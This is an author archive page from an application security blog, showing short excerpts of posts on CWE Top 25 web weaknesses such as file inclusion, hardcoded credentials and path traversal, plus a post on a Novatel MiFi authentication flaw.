AppSec Blog: Author - Johannes Ullrich

Top 25 Series - Rank 13 - PHP File Inclusion

Last year, when we got going with our web honeypot, we quickly found that file PHP file inclusion vulnerabilities are by far the #1 exploit the honeypot was exposed to [1]. In part, this may have been due to us heavily emulating PHP applications. But many of the exploits didn't match any of the installed … Continue reading Top 25 Series - Rank 13 - PHP File Inclusion


Top 25 Series - Rank 11 - Hardcoded Credentials

Talking about hard coded credentials to other developers, one of the first questions to come up is "where else to keep them?". A hard coded credential is usually a password used to obtain administrative access to software, or a password used by this same software to establish outbound connections, for example to connect to a … Continue reading Top 25 Series - Rank 11 - Hardcoded Credentials


Top 25 Series - Rank 7 - Path Traversal

In October 2001, the DShield.org site was just about a year old, I was alerted to a flood of reports hitting the site. Looking at the reports in more detail, I found out that most of them are due to blocked ICMP packets being reported to the site. Further investigation revealed that the reports where … Continue reading Top 25 Series - Rank 7 - Path Traversal


Top 25 Series - Rank 8 - Unrestricted Upload of Dangerous File Type

File uploads are a hard problem, and it is no surprise that they made it into the top 25 list. We covered some of the tactical issues in allowing file uploads in an earlier blog. This blog discusses how to use the SDL to your advantage to avoid some of the risks. Continue reading Top 25 Series - Rank 8 - Unrestricted Upload of Dangerous File Type


More MiFi Fun. Consistent Authentication Matters!

The Novatel MiFi device is a rich target for simple web application exploitation. In this example, we show how to use a simple form and a single javascript command to turn the Verizon version of the device into an open access point. Continue reading More MiFi Fun. Consistent Authentication Matters!